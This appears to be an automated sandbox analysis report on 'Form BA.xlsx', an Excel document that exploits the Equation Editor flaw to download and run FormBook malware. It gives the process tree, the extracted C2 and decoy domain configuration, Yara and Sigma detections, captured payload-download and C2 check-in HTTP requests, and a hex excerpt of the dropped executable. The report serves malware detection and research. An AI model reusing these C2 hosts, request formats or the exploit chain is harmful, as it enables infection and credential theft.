
Windows Analysis Report Form BA.xlsx

Overview

General Information

Sample Name: Form BA.xlsx
Analysis ID: 452641
MD5: f683a8eb2e17866a194af9b23efda095
SHA1: b3002f93d24336a9af003a7a3da36217a7d7b8db
SHA256: e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2384 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3024 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1700 cmdline: 'C:\Users\Public\vbc.exe' MD5: 734A568749C7879E5CA5EA2B8E082F5E)
      • vbc.exe (PID: 1780 cmdline: C:\Users\Public\vbc.exe MD5: 734A568749C7879E5CA5EA2B8E082F5E)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • rundll32.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • cmd.exe (PID: 1544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gaigoilaocai.com/wufn/"], "decoy": ["rsautoluxe.com", "theroseofsharonsalon.com", "singnema.com", "nathanielwhite108.com", "theforumonline.com", "iqpt.info", "joneshondaservice.com", "fafene.com", "solanohomebuyerclass.com", "zwq.xyz", "searchlakeconroehomes.com", "briative.com", "frystmor.city", "systemofyouth.com", "sctsmney.com", "tv-safetrading.com", "thesweetboy.com", "occulusblu.com", "pawsthemomentpetphotography.com", "travelstipsguide.com", "verifypurchase.online", "333s998.com", "amsmapped.com", "mimortgageexpert.com", "joshuatreeresearch.com", "brasilupshop.com", "support24h.site", "recipesdunnright.com", "feathertiara.net", "intoxickiss.com", "greenmommarket.com", "prinothhusky.com", "800pls.info", "martabaroagency.com", "neosinder.com", "davidwarburg.com", "chinanl168.com", "organicdiscover.com", "kingdomvets.com", "thetravellingwitch.com", "kyg-cpa.com", "bigarius.com", "collegevillepaareahomes.com", "ashestore.site", "rizqebooks.com", "techwhose.com", "peak-valleyadvertising.com", "craftbychristians.com", "laterlifelendingsupermarket.com", "setadragon.com", "pon.xyz", "reshemporium.com", "missk-hair.com", "hk6628.com", "rootmoover.com", "thetew.com", "mybodysaver.com", "cuadorcoast.com", "goteclift.com", "solisdq.info", "hsicclassactionsettlement.com", "cummingsforum.com", "talleresmulticar.com", "qq4004.com"]}

Yara Overview

Memory Dumps

Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 3.121.113.175, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3024, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3024, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1700
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1700
Sigma detected: Suspicious Process Start Without DLL
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.gaigoilaocai.com/wufn/"], "decoy": ["rsautoluxe.com", "theroseofsharonsalon.com", "singnema.com", "nathanielwhite108.com", "theforumonline.com", "iqpt.info", "joneshondaservice.com", "fafene.com", "solanohomebuyerclass.com", "zwq.xyz", "searchlakeconroehomes.com", "briative.com", "frystmor.city", "systemofyouth.com", "sctsmney.com", "tv-safetrading.com", "thesweetboy.com", "occulusblu.com", "pawsthemomentpetphotography.com", "travelstipsguide.com", "verifypurchase.online", "333s998.com", "amsmapped.com", "mimortgageexpert.com", "joshuatreeresearch.com", "brasilupshop.com", "support24h.site", "recipesdunnright.com", "feathertiara.net", "intoxickiss.com", "greenmommarket.com", "prinothhusky.com", "800pls.info", "martabaroagency.com", "neosinder.com", "davidwarburg.com", "chinanl168.com", "organicdiscover.com", "kingdomvets.com", "thetravellingwitch.com", "kyg-cpa.com", "bigarius.com", "collegevillepaareahomes.com", "ashestore.site", "rizqebooks.com", "techwhose.com", "peak-valleyadvertising.com", "craftbychristians.com", "laterlifelendingsupermarket.com", "setadragon.com", "pon.xyz", "reshemporium.com", "missk-hair.com", "hk6628.com", "rootmoover.com", "thetew.com", "mybodysaver.com", "cuadorcoast.com", "goteclift.com", "solisdq.info", "hsicclassactionsettlement.com", "cummingsforum.com", "talleresmulticar.com", "qq4004.com"]}
Multi AV Scanner detection for submitted file
Source: Form BA.xlsx; Virustotal: Detection: 31%
Source: Form BA.xlsx; ReversingLabs: Detection: 30%
Yara detected FormBook
Source: Yara match; File source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe; Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: 6.2.vbc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.vbc.exe.8967b0.2.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 6.3.vbc.exe.8967b0.0.unpack; Avira: Label: TR/ATRAPS.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb; source: vbc.exe, rundll32.exe
Source: Binary string: rundll32.pdb; source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
Source: global traffic; DNS query: name: www.pon.xyz
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 3.121.113.175:80
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 3.121.113.175:80
Source: excel.exe; Memory has grown: Private usage: 4MB later: 69MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.gaigoilaocai.com/wufn/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe; DNS query: www.pon.xyz
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Thu, 22 Jul 2021 15:14:54 GMT
  Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
  Last-Modified: Thu, 22 Jul 2021 05:09:55 GMT
  ETag: "ae200-5c7af4c3e3d9d"
  Accept-Ranges: bytes
  Content-Length: 713216
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cc df f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d8 0a 00 00 08 00 00 00 00 00 00 ce f6 0a 00 00 20 00 00 00 00 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f6 0a 00 4f 00 00 00 00 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec d6 0a 00 00 20 00 00 00 d8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0b 00 00 06 00 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc e1 00 00 70 eb 00 00 03 00 00 00 01 00 00 06 4c cd 01 00 30 29 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 45 02 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a
Source: global traffic; HTTP traffic detected:
  GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1
  Host: www.pon.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1
  Host: www.intoxickiss.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View; IP Address: 199.59.242.153 199.59.242.153
Source: global traffic; HTTP traffic detected:
  GET /www/pool.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 3.121.113.175
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 3.121.113.175 (this entry appears 50 times in the report)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emf
Source: global traffic; HTTP traffic detected:
  GET /www/pool.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 3.121.113.175
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1
  Host: www.pon.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1
  Host: www.intoxickiss.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: www.pon.xyz
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://amazon.fr/
Source: vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmp; String found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://corp.naukri.com/
